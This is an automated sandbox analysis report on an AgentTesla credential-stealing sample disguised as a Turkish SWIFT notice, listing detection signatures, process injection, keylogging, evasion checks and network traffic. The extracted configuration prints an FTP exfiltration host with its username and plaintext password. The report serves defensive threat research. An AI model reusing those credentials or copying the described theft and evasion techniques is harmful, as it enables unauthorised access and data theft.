Edit tour

Windows Analysis Report
EUR Swift Bildirimi12-08-2024.exe

Overview

General Information

Sample name:	EUR Swift Bildirimi12-08-2024.exe
Analysis ID:	1494560
MD5:	111377f936cda72a8aca49f346efa7e4
SHA1:	b9fb749f7a9004b71f932d569172c945ef573155
SHA256:	e3c05cfd183753142de8880780a2e4467338633360aa07efa9e0d48188ccd3bd
Tags:	exe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected UAC Bypass using CMSTP

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

Connects to many ports of the same IP (likely port scanning)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses FTP

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

EUR Swift Bildirimi12-08-2024.exe (PID: 7032 cmdline: "C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe" MD5: 111377F936CDA72A8ACA49F346EFA7E4)

conhost.exe (PID: 4512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AddInProcess32.exe (PID: 6184 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

MSBuild.exe (PID: 6536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 5756 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 1868 cmdline: C:\Windows\system32\WerFault.exe -u -p 7032 -s 1032 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admin@normagroup.com.tr", "Password": "Qb.X[.j.Yfm["}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.4521867809.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.4519630330.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4519630330.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.4521867809.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4521867809.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2339874172.0000021D6F933000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2339874172.0000021D6F933000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: EUR Swift Bildirimi12-08-2024.exe PID: 7032	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: EUR Swift Bildirimi12-08-2024.exe PID: 7032	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: EUR Swift Bildirimi12-08-2024.exe PID: 7032	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: EUR Swift Bildirimi12-08-2024.exe PID: 7032	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: MSBuild.exe PID: 6536	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 6536	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31219:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3128b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31315:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x313a7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31411:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31483:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31519:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x315a9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2e6da:$s2: GetPrivateProfileString 0x2ddd1:$s3: get_OSFullName 0x2f384:$s5: remove_Key 0x2f511:$s5: remove_Key 0x30452:$s6: FtpWebRequest 0x311fb:$s7: logins 0x3176d:$s7: logins 0x34450:$s7: logins 0x34530:$s7: logins 0x35e2e:$s7: logins 0x350ca:$s9: 1.85 (Hash, version 2, native byte-order)
4.2.MSBuild.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.MSBuild.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.MSBuild.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33019:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3308b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33115:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x331a7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33211:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33283:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33319:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x333a9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.MSBuild.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x304da:$s2: GetPrivateProfileString 0x2fbd1:$s3: get_OSFullName 0x31184:$s5: remove_Key 0x31311:$s5: remove_Key 0x32252:$s6: FtpWebRequest 0x32ffb:$s7: logins 0x3356d:$s7: logins 0x36250:$s7: logins 0x36330:$s7: logins 0x37c2e:$s7: logins 0x36eca:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31219:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3128b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31315:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x313a7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31411:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31483:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31519:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x315a9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2e6da:$s2: GetPrivateProfileString 0x2ddd1:$s3: get_OSFullName 0x2f384:$s5: remove_Key 0x2f511:$s5: remove_Key 0x30452:$s6: FtpWebRequest 0x311fb:$s7: logins 0x3176d:$s7: logins 0x34450:$s7: logins 0x34530:$s7: logins 0x35e2e:$s7: logins 0x350ca:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33019:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6d461:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3308b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6d4d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33115:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6d55d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x331a7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6d5ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33211:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6d659:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33283:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6d6cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33319:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6d761:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x333a9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6d7f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x304da:$s2: GetPrivateProfileString 0x6a922:$s2: GetPrivateProfileString 0x2fbd1:$s3: get_OSFullName 0x6a019:$s3: get_OSFullName 0x31184:$s5: remove_Key 0x31311:$s5: remove_Key 0x6b5cc:$s5: remove_Key 0x6b759:$s5: remove_Key 0x32252:$s6: FtpWebRequest 0x6c69a:$s6: FtpWebRequest 0x32ffb:$s7: logins 0x3356d:$s7: logins 0x36250:$s7: logins 0x36330:$s7: logins 0x37c2e:$s7: logins 0x6d443:$s7: logins 0x6d9b5:$s7: logins 0x70698:$s7: logins 0x70778:$s7: logins 0x72076:$s7: logins 0x36eca:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33019:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3308b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33115:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x331a7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33211:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33283:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33319:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x333a9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x304da:$s2: GetPrivateProfileString 0x2fbd1:$s3: get_OSFullName 0x31184:$s5: remove_Key 0x31311:$s5: remove_Key 0x32252:$s6: FtpWebRequest 0x32ffb:$s7: logins 0x3356d:$s7: logins 0x36250:$s7: logins 0x36330:$s7: logins 0x37c2e:$s7: logins 0x36eca:$s9: 1.85 (Hash, version 2, native byte-order)
Click to see the 15 entries

Suricata Signatures

ETPRO MALWARE Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.5 - Destination IP: 104.247.165.99

Timestamp:	2024-08-18T18:28:07.136150+0200
SID:	2855542
Severity:	1
Source Port:	49710
Destination Port:	51748
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.5 - Destination IP: 104.247.165.99

Timestamp:	2024-08-18T18:28:07.130584+0200
SID:	2855542
Severity:	1
Source Port:	49710
Destination Port:	51748
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE AgentTesla Exfil via FTP - Source IP: 192.168.2.5 - Destination IP: 104.247.165.99

Timestamp:	2024-08-18T18:28:06.503220+0200
SID:	2029927
Severity:	1
Source Port:	49705
Destination Port:	21
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 4.2.MSBuild.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admin@normagroup.com.tr", "Password": "Qb.X[.j.Yfm["}

Multi AV Scanner detection for domain / URL

Source: ftp.normagroup.com.tr	Virustotal: Detection: 9%			Perma Link
Source: http://ftp.normagroup.com.tr	Virustotal: Detection: 9%			Perma Link

Multi AV Scanner detection for submitted file

Source: EUR Swift Bildirimi12-08-2024.exe	ReversingLabs: Detection: 63%
Source: EUR Swift Bildirimi12-08-2024.exe	Virustotal: Detection: 56%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: EUR Swift Bildirimi12-08-2024.exe

Joe Sandbox ML: detected

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EUR Swift Bildirimi12-08-2024.exe PID: 7032, type: MEMORYSTR

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49715 version: TLS 1.0

Source: EUR Swift Bildirimi12-08-2024.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Windows.Forms.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Core.pdb2 source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: mscorlib.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.ni.pdbRSDS source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Drawing.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: mscorlib.ni.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Drawing.pdb8 source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Drawing.ni.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Core.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Windows.Forms.pdb; source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: mscorlib.pdbPM source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.pdbP source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.ni.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Core.ni.pdb source: WEREE81.tmp.dmp.8.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49710 -> 104.247.165.99:51748
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49705 -> 104.247.165.99:21

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 104.247.165.99 ports 62340,65320,65356,63442,53290,64424,58684,57066,63505,63418,64947,1,57612,2,53201,52992,51048,53479,54777,49430,52836,51748,21

Source: global traffic

TCP traffic: 192.168.2.5:49710 -> 104.247.165.99:51748

Source: global traffic

TCP traffic: 192.168.2.5:54692 -> 1.1.1.1:53

Source: Joe Sandbox View

IP Address: 104.247.165.99 104.247.165.99

Source: Joe Sandbox View

ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS

Source: Joe Sandbox View

JA3 fingerprint: 1138de370e523e824bbca92d049a3777

Source: unknown

FTP traffic detected: 104.247.165.99:21 -> 192.168.2.5:49705 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 50 allowed.220-Local time is now 19:28. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 50 allowed.220-Local time is now 19:28. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 50 allowed.220-Local time is now 19:28. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 50 allowed.220-Local time is now 19:28. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49715 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: ftp.normagroup.com.tr

Source: MSBuild.exe, 00000004.00000002.4521867809.0000000002F73000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4521867809.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4521867809.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4521867809.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4521867809.000000000308E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.normagroup.com.tr
Source: MSBuild.exe, 00000004.00000002.4521867809.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2339874172.0000021D6F933000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4519630330.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, SKTzxzsJw.cs	.Net Code: TFawXa
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.raw.unpack, SKTzxzsJw.cs	.Net Code: TFawXa

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen

.NET source code contains very large array initializations

Source: EUR Swift Bildirimi12-08-2024.exe, -----------------.cs

Large array initialization: _0E7A_0E4C_0E64_0E5B_0E4B_0E61_0E7F_0E7A_0E70_0E7D_0E5E_0E37_0E65_0E7F_0E7C_0E5F_0E5A: array initializer size 34816

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Code function: 0_2_00007FF848DAD16D	0_2_00007FF848DAD16D
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Code function: 0_2_00007FF848DAAB40	0_2_00007FF848DAAB40
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Code function: 0_2_00007FF848DA11E2	0_2_00007FF848DA11E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01379BB0	4_2_01379BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01374A60	4_2_01374A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0137CF20	4_2_0137CF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01373E48	4_2_01373E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01374190	4_2_01374190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_062356E0	4_2_062356E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_06232EF8	4_2_06232EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_06233F58	4_2_06233F58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0623BD18	4_2_0623BD18
